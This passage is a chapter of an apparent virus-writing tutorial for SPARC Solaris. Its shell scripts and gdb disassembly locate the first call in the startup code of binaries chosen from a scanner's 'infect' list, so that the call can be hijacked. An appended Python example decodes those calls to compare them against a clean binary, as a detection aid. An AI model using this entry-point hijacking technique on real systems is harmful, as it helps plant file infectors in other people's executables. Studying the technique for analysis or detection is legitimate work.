10. The entry point


The longest part of the journey is said to be the passing of the gate.

Marcus Terentius Varro

If we decide to leave entry_point as it is, we have to patch something else. One approach is to disassemble the code starting at entry_point, find the first call (or jmp) and abuse it. That requires far too much intelligence for a virus, though. But we are operating in a homogeneous environment: one compiler and one C run-time library for everything, so the startup code should be the same for every executable.

Command: pre/sparc-sunos5.9/entry_point/gdb/SunOS.sh
#!/usr/xpg4/bin/sh
# keep only the disassembly from the first "call" up to the following "restore"
pre/sparc-sunos5.9/entry_point/gdb_core.sh \
| /usr/xpg4/bin/sed -ne '/\<call\>/,/\<restore\>/p' \
| pre/sparc-sunos5.9/magic_elf/gdb_format.pl

We work on the shell found in A kingdom for a shell. The tool from Extracting e_entry retrieves the entry point. On some shells a read from a pipe runs in a sub-shell, so the variables it sets are not visible in the surrounding scope. The while loop therefore runs just once; its only purpose is to keep read and the gdb invocation in the same block.

Command: pre/sparc-sunos5.9/entry_point/gdb_core.sh
#!/usr/xpg4/bin/sh
# first binary listed by the segment_padding scanner
shell=$( /usr/xpg4/bin/sed 1q \
	out/sparc-sunos5.9/scanner/segment_padding/infect )

# e_entry prints the entry point (hex, without 0x) and an offset field on one line;
# the single-iteration while loop keeps read and gdb in the same block
tmp/sparc-sunos5.9/evil_magic/e_entry ${shell} \
| while read entry_point offset
do
  /usr/bin/echo "[entry_point=${entry_point}]"
  # break at the entry point and run, so the shared libraries are mapped and
  # call targets resolve to symbols, then disassemble 256 bytes from there
  /opt/sfw/bin/gdb ${shell} -q <<EOT 2>&1
	
	break *0x${entry_point}
	run
	disassemble 0x${entry_point} 0x${entry_point}+0x100
EOT
done

Output: out/sparc-sunos5.9/entry_point/sh.gdb
0x17fb8 <_start+172>:         call          0x44034 <atexit>
0x17fbc <_start+176>:         nop           
0x17fc0 <_start+180>:         sethi         %hi(0x32c00), %o0
0x17fc4 <_start+184>:         call          0x44034 <atexit>
0x17fc8 <_start+188>:         or            %o0, 0x2e8, %o0     ! 0x32ee8 <_fini>
0x17fcc <_start+192>:         sethi         %hi(0x44400), %o0
0x17fd0 <_start+196>:         ld            [ %o0 + 0x310 ], %o0! 0x44710 <___Argv+4>
0x17fd4 <_start+200>:         tst           %o0
0x17fd8 <_start+204>:         bne           0x17ffc <_start+240>
0x17fdc <_start+208>:         nop           
0x17fe0 <_start+212>:         sethi         %hi(0x44400), %o0
0x17fe4 <_start+216>:         ld            [ %o0 + 0x314 ], %o0! 0x44714 <___Argv+8>
0x17fe8 <_start+220>:         tst           %o0
0x17fec <_start+224>:         be            0x17ffc <_start+240>
0x17ff0 <_start+228>:         nop           
0x17ff4 <_start+232>:         call          0x44034 <atexit>
0x17ff8 <_start+236>:         nop           
0x17ffc <_start+240>:         call          0x32e98 <_init>
0x18000 <_start+244>:         nop           
0x18004 <_start+248>:         mov           %l0, %o0
0x18008 <_start+252>:         mov           %l1, %o1
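The same lookup can be done statically, without running the binary: parse the ELF32 header, map e_entry to its file offset through the PT_LOAD segment that contains it, and decode the SPARC call instructions that follow. This is an added example, not one of the chapter's tools; it runs on a constructed image (the layout constants and the sample code words are assumptions) and is meant for comparing the call layout of a binary's startup code with that of a clean binary from the same toolchain, which the homogeneity argument above makes possible.

```python
import struct

# Big-endian ELF32 layouts (SPARC is big-endian): 52-byte header, 32-byte program header.
ELF32_EHDR = ">16sHHIIIIIHHHHHH"
ELF32_PHDR = ">IIIIIIII"
PT_LOAD = 1

def entry_file_offset(image):
    """Return (e_entry, file offset of e_entry) using the PT_LOAD segment that holds it."""
    hdr = struct.unpack_from(ELF32_EHDR, image, 0)
    e_entry, e_phoff, e_phentsize, e_phnum = hdr[4], hdr[5], hdr[9], hdr[10]
    for i in range(e_phnum):
        p_type, p_offset, p_vaddr, _, p_filesz, _, _, _ = struct.unpack_from(
            ELF32_PHDR, image, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD and p_vaddr <= e_entry < p_vaddr + p_filesz:
            return e_entry, p_offset + (e_entry - p_vaddr)
    raise ValueError("e_entry lies outside every PT_LOAD segment")

def call_targets(image, length=0x100):
    """List (pc, target) for every SPARC `call` in the first `length` bytes at e_entry."""
    entry, off = entry_file_offset(image)
    found = []
    for i in range(0, length, 4):
        if off + i + 4 > len(image):
            break                                  # ran off the end of the file
        word = struct.unpack_from(">I", image, off + i)[0]
        if word >> 30 != 1:                        # SPARC call: bits 31..30 == 01
            continue
        disp = word & 0x3FFFFFFF                   # signed 30-bit word displacement
        if disp & 0x20000000:
            disp -= 0x40000000
        found.append((entry + i, (entry + i + 4 * disp) & 0xFFFFFFFF))
    return found

def build_sample_image():
    """Constructed input, not a real binary: one PT_LOAD at 0x10000, code at offset 0x100."""
    # call +0x100 ; nop ; call -0x108 ; tst %o0
    code = struct.pack(">IIII", 0x40000040, 0x01000000, 0x7FFFFFBE, 0x80900008)
    size = 0x100 + len(code)
    ident = b"\x7fELF\x01\x02\x01" + b"\0" * 9     # ELFCLASS32, ELFDATA2MSB, EV_CURRENT
    ehdr = struct.pack(ELF32_EHDR, ident, 2, 2, 1, 0x10100, 52, 0, 0,   # ET_EXEC, EM_SPARC
                       52, 32, 1, 0, 0, 0)
    phdr = struct.pack(ELF32_PHDR, PT_LOAD, 0, 0x10000, 0x10000, size, size, 5, 0x10000)
    return ehdr + phdr + b"\0" * (0x100 - len(ehdr) - len(phdr)) + code

if __name__ == "__main__":
    for pc, target in call_targets(build_sample_image()):
        print(f"0x{pc:x}: call 0x{target:x}")     # 0x10100: call 0x10200 / 0x10108: call 0x10000
```

Running it over a real binary only needs `call_targets(open(path, "rb").read())`; a list that differs from the clean reference's is the signal worth investigating.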